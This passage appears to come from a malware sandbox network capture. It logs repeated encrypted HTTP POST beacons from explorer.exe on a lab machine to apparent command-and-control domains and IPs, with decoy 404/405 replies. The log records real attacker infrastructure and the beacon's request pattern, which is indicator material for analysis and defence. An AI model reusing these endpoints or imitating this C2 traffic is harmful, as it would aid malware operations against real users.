                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)F=nYK5KD{x~ZYEp1*$8fd{U_gZs}+vEsf;_Cb Ko+7Az#9go&oinfOyS3&Eq|uT0
                                            Dec 19, 2024 11:00:34.846632957 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:34 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            36 | 192.168.2.5 | 50013 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:39.199218035 CET | 286 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ukacgtlptxyqmcdq.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 335
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:39.199258089 CET | 335 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ad 1f 59 d5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Y!_5?[3}'YJrv+n!QF0r'so,UeSuKVpyy5?tW&ys=Q3?KiMKfkX ~V>JdaoDiEA:
                                            Dec 19, 2024 11:00:40.565376997 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:40 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            37 | 192.168.2.5 | 50014 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:40.698086977 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://daxnrqammsrat.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 230
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:40.698121071 CET | 230 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fd 4e 39 a5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)N9!|#%4JRC@bEQ^E2+ZsI`PqHM%Fm{V$ryE@Ht|5jyIp[(uC^?:y
                                            Dec 19, 2024 11:00:42.052089930 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:41 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            38 | 192.168.2.5 | 50015 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:42.186908960 CET | 280 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dsjauwmdkccdd.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 150
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:42.186943054 CET | 150 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 80 22 50 96
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)"P)F(|i6te.B**HZF!iGAX;[iG
                                            Dec 19, 2024 11:00:43.521437883 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:43 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            39 | 192.168.2.5 | 50016 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:47.776496887 CET | 286 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://tupclykpsytewcxu.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 217
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:47.776541948 CET | 217 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 85 5a 38 89
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Z8(pXdE};6L)FKB<-yg-,P0I3E0u@|xrqF/I,Wv>eadl.kS?dI#
                                            Dec 19, 2024 11:00:49.147445917 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:48 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            40 | 192.168.2.5 | 50017 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:49.274692059 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://livftrpgdgydc.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 297
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:49.274730921 CET | 297 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ba 24 2a 92
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)$*jNMo`q0xA[p&V)E%W/HG@]bR/vw?xt"b#fq@$xWjE^*x*k1+8^uoXcm+X{Q
                                            Dec 19, 2024 11:00:50.646676064 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:50 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            41 | 192.168.2.5 | 50018 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:50.773264885 CET | 281 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://drjnlhtrahircg.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 192
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:50.773303032 CET | 192 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e5 4a 2c bf
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)J,r~;-XfjdZ9qYW6 &ik]r|O:npdAq)A>"(.)bl^J:c
                                            Dec 19, 2024 11:00:52.117582083 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            42 | 192.168.2.5 | 50019 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:56.760693073 CET | 282 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://lhhcirujvotn.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 160
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:56.760725975 CET | 160 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 98 43 2f cc
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)C//iQFr!-]X*_5 ^mDH*irL*p_ufb__!v
                                            Dec 19, 2024 11:00:58.140840054 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:57 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            43 | 192.168.2.5 | 50020 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:58.271836042 CET | 287 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://unomwhjdoaagckk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 202
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:58.271836042 CET | 202 | OUT | (binary request body)
                                            Dec 19, 2024 11:00:59.638279915 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:59 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            44 | 192.168.2.5 | 50021 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:59.771935940 CET | 279 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://drmwwxjjhona.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 223
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:59.771965981 CET | 223 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:01.112617016 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:00 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            45 | 192.168.2.5 | 50022 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:05.126802921 CET | 282 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jqxnkwoysqpv.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 245
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:05.126802921 CET | 245 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:06.509078026 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:06 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            46 | 192.168.2.5 | 50023 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:06.634035110 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://swhsbooovvrt.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 205
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:06.634068966 CET | 205 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:08.004259109 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:07 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            47 | 192.168.2.5 | 50024 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:08.136343956 CET | 278 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://odsnbdoswem.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 119
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:08.136374950 CET | 119 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:09.477787971 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            48 | 192.168.2.5 | 50025 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:14.152884960 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jrdgusgumlecx.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 319
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:14.152934074 CET | 319 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:15.514272928 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:15 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            49 | 192.168.2.5 | 50026 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:15.643481016 CET | 286 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ljmtvjfukirthh.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 325
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:15.643481016 CET | 325 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:17.013854027 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:16 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            50 | 192.168.2.5 | 50027 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:17.145970106 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://vlctchybxmsfmihs.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 332
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:17.145992994 CET | 332 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:18.481949091 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:18 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            51 | 192.168.2.5 | 50028 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:22.850096941 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://sgmoymnkvjycr.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 237
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:22.850096941 CET | 237 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:24.212259054 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:23 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            52 | 192.168.2.5 | 50029 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:24.338927984 CET | 286 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://nnfjblhdxniepv.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 230
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:24.338943005 CET | 230 | OUT | (binary request body)
                                            Dec 19, 2024 11:01:25.693094015 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:25 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            53 | 192.168.2.5 | 50030 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:25.834745884 CET | 279 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://gwxdktlpqqov.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 167
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:25.834745884 CET | 167 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bd 06 6f db
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)oTvRRwS'~u:g\)19B\S!n^lp?uhUmAF
                                            Dec 19, 2024 11:01:27.174427986 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:26 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            54 | 192.168.2.5 | 50031 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:31.331737995 CET | 281 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ygdgxkxjwyg.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 270
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:31.334003925 CET | 270 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a3 3f 4c 97
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)?LpTwKbdb'D^H [khRm"f6B.Z.pGV|*vMS"@0u`LLsg@}~gd~3+Mw=s_d/T
                                            Dec 19, 2024 11:01:32.784692049 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:32 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
